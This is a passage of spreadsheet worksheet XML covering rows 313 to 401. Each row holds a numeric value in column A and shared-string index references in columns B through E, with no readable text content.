      <c r="C313" s="108" t="s">
        <v>1630</v>
      </c>
      <c r="D313" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E313" s="110" t="s">
        <v>3464</v>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="101">
        <v>2208.0</v>
      </c>
      <c r="B314" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C314" s="103" t="s">
        <v>1633</v>
      </c>
      <c r="D314" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E314" s="105" t="s">
        <v>3465</v>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="106">
        <v>2242.0</v>
      </c>
      <c r="B315" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C315" s="108" t="s">
        <v>1636</v>
      </c>
      <c r="D315" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E315" s="110" t="s">
        <v>3466</v>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="101">
        <v>2776.0</v>
      </c>
      <c r="B316" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C316" s="103" t="s">
        <v>1642</v>
      </c>
      <c r="D316" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E316" s="105" t="s">
        <v>3467</v>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="106">
        <v>4176.0</v>
      </c>
      <c r="B317" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C317" s="108" t="s">
        <v>1648</v>
      </c>
      <c r="D317" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E317" s="110" t="s">
        <v>3468</v>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="101">
        <v>4704.0</v>
      </c>
      <c r="B318" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C318" s="103" t="s">
        <v>1654</v>
      </c>
      <c r="D318" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E318" s="105" t="s">
        <v>3469</v>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="106">
        <v>6202.0</v>
      </c>
      <c r="B319" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C319" s="108" t="s">
        <v>1660</v>
      </c>
      <c r="D319" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E319" s="110" t="s">
        <v>3470</v>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="101">
        <v>7241.0</v>
      </c>
      <c r="B320" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C320" s="103" t="s">
        <v>1666</v>
      </c>
      <c r="D320" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E320" s="105" t="s">
        <v>3471</v>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="106">
        <v>7451.0</v>
      </c>
      <c r="B321" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C321" s="108" t="s">
        <v>1669</v>
      </c>
      <c r="D321" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E321" s="110" t="s">
        <v>3472</v>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="101">
        <v>7473.0</v>
      </c>
      <c r="B322" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C322" s="103" t="s">
        <v>1672</v>
      </c>
      <c r="D322" s="104" t="s">
        <v>3008</v>
      </c>
      <c r="E322" s="105" t="s">
        <v>3473</v>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="106">
        <v>7501.0</v>
      </c>
      <c r="B323" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C323" s="108" t="s">
        <v>1675</v>
      </c>
      <c r="D323" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E323" s="110" t="s">
        <v>3474</v>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="101">
        <v>7511.0</v>
      </c>
      <c r="B324" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C324" s="103" t="s">
        <v>1678</v>
      </c>
      <c r="D324" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E324" s="105" t="s">
        <v>3475</v>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="106">
        <v>7535.0</v>
      </c>
      <c r="B325" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C325" s="108" t="s">
        <v>1681</v>
      </c>
      <c r="D325" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E325" s="110" t="s">
        <v>3476</v>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="101">
        <v>7848.0</v>
      </c>
      <c r="B326" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C326" s="103" t="s">
        <v>1684</v>
      </c>
      <c r="D326" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E326" s="105" t="s">
        <v>3477</v>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="106">
        <v>9055.0</v>
      </c>
      <c r="B327" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C327" s="108" t="s">
        <v>1687</v>
      </c>
      <c r="D327" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E327" s="110" t="s">
        <v>3478</v>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="101">
        <v>10608.0</v>
      </c>
      <c r="B328" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C328" s="103" t="s">
        <v>1690</v>
      </c>
      <c r="D328" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E328" s="105" t="s">
        <v>3479</v>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="106">
        <v>183.0</v>
      </c>
      <c r="B329" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C329" s="108" t="s">
        <v>1693</v>
      </c>
      <c r="D329" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E329" s="110" t="s">
        <v>3480</v>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="101">
        <v>1731.0</v>
      </c>
      <c r="B330" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C330" s="103" t="s">
        <v>1699</v>
      </c>
      <c r="D330" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E330" s="105" t="s">
        <v>3481</v>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="106">
        <v>1811.0</v>
      </c>
      <c r="B331" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C331" s="108" t="s">
        <v>1706</v>
      </c>
      <c r="D331" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E331" s="110" t="s">
        <v>3482</v>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="101">
        <v>2532.0</v>
      </c>
      <c r="B332" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C332" s="103" t="s">
        <v>1709</v>
      </c>
      <c r="D332" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E332" s="105" t="s">
        <v>3483</v>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="106">
        <v>2776.0</v>
      </c>
      <c r="B333" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C333" s="108" t="s">
        <v>1712</v>
      </c>
      <c r="D333" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E333" s="110" t="s">
        <v>3484</v>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="101">
        <v>2777.0</v>
      </c>
      <c r="B334" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C334" s="103" t="s">
        <v>1715</v>
      </c>
      <c r="D334" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E334" s="105" t="s">
        <v>3485</v>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="106">
        <v>3174.0</v>
      </c>
      <c r="B335" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C335" s="108" t="s">
        <v>1721</v>
      </c>
      <c r="D335" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E335" s="110" t="s">
        <v>3486</v>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="101">
        <v>3376.0</v>
      </c>
      <c r="B336" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C336" s="103" t="s">
        <v>1727</v>
      </c>
      <c r="D336" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E336" s="105" t="s">
        <v>3487</v>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="106">
        <v>3382.0</v>
      </c>
      <c r="B337" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C337" s="108" t="s">
        <v>1730</v>
      </c>
      <c r="D337" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E337" s="110" t="s">
        <v>3488</v>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="101">
        <v>3584.0</v>
      </c>
      <c r="B338" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C338" s="103" t="s">
        <v>1739</v>
      </c>
      <c r="D338" s="104" t="s">
        <v>3032</v>
      </c>
      <c r="E338" s="105" t="s">
        <v>3489</v>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="106">
        <v>3604.0</v>
      </c>
      <c r="B339" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C339" s="108" t="s">
        <v>1742</v>
      </c>
      <c r="D339" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E339" s="110" t="s">
        <v>3490</v>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="101">
        <v>3630.0</v>
      </c>
      <c r="B340" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C340" s="103" t="s">
        <v>1745</v>
      </c>
      <c r="D340" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E340" s="105" t="s">
        <v>3491</v>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="106">
        <v>3946.0</v>
      </c>
      <c r="B341" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C341" s="108" t="s">
        <v>1751</v>
      </c>
      <c r="D341" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E341" s="110" t="s">
        <v>3492</v>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="101">
        <v>4548.0</v>
      </c>
      <c r="B342" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C342" s="103" t="s">
        <v>1757</v>
      </c>
      <c r="D342" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E342" s="105" t="s">
        <v>3493</v>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="106">
        <v>4611.0</v>
      </c>
      <c r="B343" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C343" s="108" t="s">
        <v>1760</v>
      </c>
      <c r="D343" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E343" s="110" t="s">
        <v>3494</v>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="101">
        <v>4621.0</v>
      </c>
      <c r="B344" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C344" s="103" t="s">
        <v>1763</v>
      </c>
      <c r="D344" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E344" s="105" t="s">
        <v>3495</v>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="106">
        <v>4943.0</v>
      </c>
      <c r="B345" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C345" s="108" t="s">
        <v>1772</v>
      </c>
      <c r="D345" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E345" s="110" t="s">
        <v>3496</v>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="101">
        <v>5469.0</v>
      </c>
      <c r="B346" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C346" s="103" t="s">
        <v>1791</v>
      </c>
      <c r="D346" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E346" s="105" t="s">
        <v>3497</v>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="106">
        <v>5990.0</v>
      </c>
      <c r="B347" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C347" s="108" t="s">
        <v>1803</v>
      </c>
      <c r="D347" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E347" s="110" t="s">
        <v>3498</v>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="101">
        <v>6007.0</v>
      </c>
      <c r="B348" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C348" s="103" t="s">
        <v>1806</v>
      </c>
      <c r="D348" s="104" t="s">
        <v>2960</v>
      </c>
      <c r="E348" s="105" t="s">
        <v>3499</v>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="106">
        <v>6403.0</v>
      </c>
      <c r="B349" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C349" s="108" t="s">
        <v>1812</v>
      </c>
      <c r="D349" s="109" t="s">
        <v>3042</v>
      </c>
      <c r="E349" s="110" t="s">
        <v>3500</v>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="101">
        <v>6484.0</v>
      </c>
      <c r="B350" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C350" s="103" t="s">
        <v>1821</v>
      </c>
      <c r="D350" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E350" s="105" t="s">
        <v>3501</v>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="106">
        <v>6610.0</v>
      </c>
      <c r="B351" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C351" s="108" t="s">
        <v>1824</v>
      </c>
      <c r="D351" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E351" s="110" t="s">
        <v>3502</v>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="101">
        <v>6723.0</v>
      </c>
      <c r="B352" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C352" s="103" t="s">
        <v>1830</v>
      </c>
      <c r="D352" s="104" t="s">
        <v>2953</v>
      </c>
      <c r="E352" s="105" t="s">
        <v>3503</v>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="106">
        <v>6859.0</v>
      </c>
      <c r="B353" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C353" s="108" t="s">
        <v>1833</v>
      </c>
      <c r="D353" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E353" s="110" t="s">
        <v>3504</v>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="101">
        <v>7101.0</v>
      </c>
      <c r="B354" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C354" s="103" t="s">
        <v>1836</v>
      </c>
      <c r="D354" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E354" s="105" t="s">
        <v>3505</v>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="106">
        <v>7106.0</v>
      </c>
      <c r="B355" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C355" s="108" t="s">
        <v>1839</v>
      </c>
      <c r="D355" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E355" s="110" t="s">
        <v>3506</v>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="101">
        <v>7212.0</v>
      </c>
      <c r="B356" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C356" s="103" t="s">
        <v>1842</v>
      </c>
      <c r="D356" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E356" s="105" t="s">
        <v>3507</v>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="106">
        <v>7308.0</v>
      </c>
      <c r="B357" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C357" s="108" t="s">
        <v>1845</v>
      </c>
      <c r="D357" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E357" s="110" t="s">
        <v>3508</v>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="101">
        <v>7314.0</v>
      </c>
      <c r="B358" s="102" t="s">
        <v>72</v>
      </c>
      <c r="C358" s="103" t="s">
        <v>1848</v>
      </c>
      <c r="D358" s="104" t="s">
        <v>3015</v>
      </c>
      <c r="E358" s="105" t="s">
        <v>3509</v>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="106">
        <v>7490.0</v>
      </c>
      <c r="B359" s="107" t="s">
        <v>72</v>
      </c>
      <c r="C359" s="108" t="s">
        <v>1851</v>
      </c>
      <c r="D359" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E359" s="110" t="s">
        <v>3510</v>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="101">
        <v>5533.0</v>
      </c>
      <c r="B360" s="102" t="s">
        <v>74</v>
      </c>
      <c r="C360" s="103" t="s">
        <v>1854</v>
      </c>
      <c r="D360" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E360" s="105" t="s">
        <v>3511</v>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="106">
        <v>5694.0</v>
      </c>
      <c r="B361" s="107" t="s">
        <v>74</v>
      </c>
      <c r="C361" s="108" t="s">
        <v>1857</v>
      </c>
      <c r="D361" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E361" s="110" t="s">
        <v>3512</v>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="101">
        <v>6520.0</v>
      </c>
      <c r="B362" s="102" t="s">
        <v>74</v>
      </c>
      <c r="C362" s="103" t="s">
        <v>1863</v>
      </c>
      <c r="D362" s="104" t="s">
        <v>2981</v>
      </c>
      <c r="E362" s="105" t="s">
        <v>3513</v>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="106">
        <v>8986.0</v>
      </c>
      <c r="B363" s="107" t="s">
        <v>74</v>
      </c>
      <c r="C363" s="108" t="s">
        <v>1866</v>
      </c>
      <c r="D363" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E363" s="110" t="s">
        <v>3514</v>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="101">
        <v>9362.0</v>
      </c>
      <c r="B364" s="102" t="s">
        <v>74</v>
      </c>
      <c r="C364" s="103" t="s">
        <v>1869</v>
      </c>
      <c r="D364" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E364" s="105" t="s">
        <v>3515</v>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="106">
        <v>9508.0</v>
      </c>
      <c r="B365" s="107" t="s">
        <v>74</v>
      </c>
      <c r="C365" s="108" t="s">
        <v>1872</v>
      </c>
      <c r="D365" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E365" s="110" t="s">
        <v>3516</v>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="101">
        <v>10190.0</v>
      </c>
      <c r="B366" s="102" t="s">
        <v>74</v>
      </c>
      <c r="C366" s="103" t="s">
        <v>1875</v>
      </c>
      <c r="D366" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E366" s="105" t="s">
        <v>3517</v>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="106">
        <v>11953.0</v>
      </c>
      <c r="B367" s="107" t="s">
        <v>74</v>
      </c>
      <c r="C367" s="108" t="s">
        <v>1878</v>
      </c>
      <c r="D367" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E367" s="110" t="s">
        <v>3518</v>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="101">
        <v>13671.0</v>
      </c>
      <c r="B368" s="102" t="s">
        <v>74</v>
      </c>
      <c r="C368" s="103" t="s">
        <v>1881</v>
      </c>
      <c r="D368" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E368" s="105" t="s">
        <v>3519</v>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="106">
        <v>15381.0</v>
      </c>
      <c r="B369" s="107" t="s">
        <v>74</v>
      </c>
      <c r="C369" s="108" t="s">
        <v>1884</v>
      </c>
      <c r="D369" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E369" s="110" t="s">
        <v>3520</v>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="101">
        <v>999.0</v>
      </c>
      <c r="B370" s="102" t="s">
        <v>76</v>
      </c>
      <c r="C370" s="103" t="s">
        <v>1899</v>
      </c>
      <c r="D370" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E370" s="105" t="s">
        <v>3521</v>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="106">
        <v>1499.0</v>
      </c>
      <c r="B371" s="107" t="s">
        <v>76</v>
      </c>
      <c r="C371" s="108" t="s">
        <v>1902</v>
      </c>
      <c r="D371" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E371" s="110" t="s">
        <v>3522</v>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="101">
        <v>1964.0</v>
      </c>
      <c r="B372" s="102" t="s">
        <v>78</v>
      </c>
      <c r="C372" s="103" t="s">
        <v>1905</v>
      </c>
      <c r="D372" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E372" s="105" t="s">
        <v>3523</v>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="106">
        <v>1998.0</v>
      </c>
      <c r="B373" s="107" t="s">
        <v>78</v>
      </c>
      <c r="C373" s="108" t="s">
        <v>1908</v>
      </c>
      <c r="D373" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E373" s="110" t="s">
        <v>3524</v>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="101">
        <v>2152.0</v>
      </c>
      <c r="B374" s="102" t="s">
        <v>78</v>
      </c>
      <c r="C374" s="103" t="s">
        <v>1914</v>
      </c>
      <c r="D374" s="104" t="s">
        <v>3001</v>
      </c>
      <c r="E374" s="105" t="s">
        <v>3525</v>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="106">
        <v>2322.0</v>
      </c>
      <c r="B375" s="107" t="s">
        <v>78</v>
      </c>
      <c r="C375" s="108" t="s">
        <v>1918</v>
      </c>
      <c r="D375" s="109" t="s">
        <v>3001</v>
      </c>
      <c r="E375" s="110" t="s">
        <v>3526</v>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="101">
        <v>2329.0</v>
      </c>
      <c r="B376" s="102" t="s">
        <v>78</v>
      </c>
      <c r="C376" s="103" t="s">
        <v>1921</v>
      </c>
      <c r="D376" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E376" s="105" t="s">
        <v>3527</v>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="106">
        <v>2529.0</v>
      </c>
      <c r="B377" s="107" t="s">
        <v>78</v>
      </c>
      <c r="C377" s="108" t="s">
        <v>1924</v>
      </c>
      <c r="D377" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E377" s="110" t="s">
        <v>3528</v>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="101">
        <v>13824.0</v>
      </c>
      <c r="B378" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C378" s="103" t="s">
        <v>1927</v>
      </c>
      <c r="D378" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E378" s="105" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="106">
        <v>13831.0</v>
      </c>
      <c r="B379" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C379" s="108" t="s">
        <v>1930</v>
      </c>
      <c r="D379" s="109" t="s">
        <v>3038</v>
      </c>
      <c r="E379" s="110" t="s">
        <v>3530</v>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="101">
        <v>13986.0</v>
      </c>
      <c r="B380" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C380" s="103" t="s">
        <v>1933</v>
      </c>
      <c r="D380" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E380" s="105" t="s">
        <v>3531</v>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="106">
        <v>14208.0</v>
      </c>
      <c r="B381" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C381" s="108" t="s">
        <v>1936</v>
      </c>
      <c r="D381" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E381" s="110" t="s">
        <v>3532</v>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="101">
        <v>14291.0</v>
      </c>
      <c r="B382" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C382" s="103" t="s">
        <v>1939</v>
      </c>
      <c r="D382" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E382" s="105" t="s">
        <v>3533</v>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="106">
        <v>14498.0</v>
      </c>
      <c r="B383" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C383" s="108" t="s">
        <v>1945</v>
      </c>
      <c r="D383" s="109" t="s">
        <v>2953</v>
      </c>
      <c r="E383" s="110" t="s">
        <v>3534</v>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="101">
        <v>14647.0</v>
      </c>
      <c r="B384" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C384" s="103" t="s">
        <v>1948</v>
      </c>
      <c r="D384" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E384" s="105" t="s">
        <v>3535</v>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="106">
        <v>14674.0</v>
      </c>
      <c r="B385" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C385" s="108" t="s">
        <v>1951</v>
      </c>
      <c r="D385" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E385" s="110" t="s">
        <v>3536</v>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="101">
        <v>14676.0</v>
      </c>
      <c r="B386" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C386" s="103" t="s">
        <v>1954</v>
      </c>
      <c r="D386" s="104" t="s">
        <v>2953</v>
      </c>
      <c r="E386" s="105" t="s">
        <v>3537</v>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="106">
        <v>15430.0</v>
      </c>
      <c r="B387" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C387" s="108" t="s">
        <v>1963</v>
      </c>
      <c r="D387" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E387" s="110" t="s">
        <v>3538</v>
      </c>
    </row>
    <row r="388">
      <c r="A388" s="101">
        <v>15476.0</v>
      </c>
      <c r="B388" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C388" s="103" t="s">
        <v>1966</v>
      </c>
      <c r="D388" s="104" t="s">
        <v>2953</v>
      </c>
      <c r="E388" s="105" t="s">
        <v>3539</v>
      </c>
    </row>
    <row r="389">
      <c r="A389" s="106">
        <v>15485.0</v>
      </c>
      <c r="B389" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C389" s="108" t="s">
        <v>1969</v>
      </c>
      <c r="D389" s="109" t="s">
        <v>2969</v>
      </c>
      <c r="E389" s="110" t="s">
        <v>3540</v>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="101">
        <v>15720.0</v>
      </c>
      <c r="B390" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C390" s="103" t="s">
        <v>1972</v>
      </c>
      <c r="D390" s="104" t="s">
        <v>3038</v>
      </c>
      <c r="E390" s="105" t="s">
        <v>3541</v>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="106">
        <v>15765.0</v>
      </c>
      <c r="B391" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C391" s="108" t="s">
        <v>1975</v>
      </c>
      <c r="D391" s="109" t="s">
        <v>2953</v>
      </c>
      <c r="E391" s="110" t="s">
        <v>3542</v>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="101">
        <v>15828.0</v>
      </c>
      <c r="B392" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C392" s="103" t="s">
        <v>1978</v>
      </c>
      <c r="D392" s="104" t="s">
        <v>2989</v>
      </c>
      <c r="E392" s="105" t="s">
        <v>3543</v>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="106">
        <v>16150.0</v>
      </c>
      <c r="B393" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C393" s="108" t="s">
        <v>1984</v>
      </c>
      <c r="D393" s="109" t="s">
        <v>2981</v>
      </c>
      <c r="E393" s="110" t="s">
        <v>3544</v>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="101">
        <v>16856.0</v>
      </c>
      <c r="B394" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C394" s="103" t="s">
        <v>1990</v>
      </c>
      <c r="D394" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E394" s="105" t="s">
        <v>3545</v>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="106">
        <v>16857.0</v>
      </c>
      <c r="B395" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C395" s="108" t="s">
        <v>1993</v>
      </c>
      <c r="D395" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E395" s="110" t="s">
        <v>3546</v>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="101">
        <v>17204.0</v>
      </c>
      <c r="B396" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C396" s="103" t="s">
        <v>1999</v>
      </c>
      <c r="D396" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E396" s="105" t="s">
        <v>3547</v>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="106">
        <v>17341.0</v>
      </c>
      <c r="B397" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C397" s="108" t="s">
        <v>2002</v>
      </c>
      <c r="D397" s="109" t="s">
        <v>3015</v>
      </c>
      <c r="E397" s="110" t="s">
        <v>3548</v>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="101">
        <v>17524.0</v>
      </c>
      <c r="B398" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C398" s="103" t="s">
        <v>2008</v>
      </c>
      <c r="D398" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E398" s="105" t="s">
        <v>3549</v>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="106">
        <v>17542.0</v>
      </c>
      <c r="B399" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C399" s="108" t="s">
        <v>2011</v>
      </c>
      <c r="D399" s="109" t="s">
        <v>2989</v>
      </c>
      <c r="E399" s="110" t="s">
        <v>3550</v>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="101">
        <v>17585.0</v>
      </c>
      <c r="B400" s="102" t="s">
        <v>80</v>
      </c>
      <c r="C400" s="103" t="s">
        <v>2014</v>
      </c>
      <c r="D400" s="104" t="s">
        <v>2969</v>
      </c>
      <c r="E400" s="105" t="s">
        <v>3551</v>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="106">
        <v>17763.0</v>
      </c>
      <c r="B401" s="107" t="s">
        <v>80</v>
      </c>
      <c r="C401" s="108" t="s">
        <v>2021</v>
      </c>
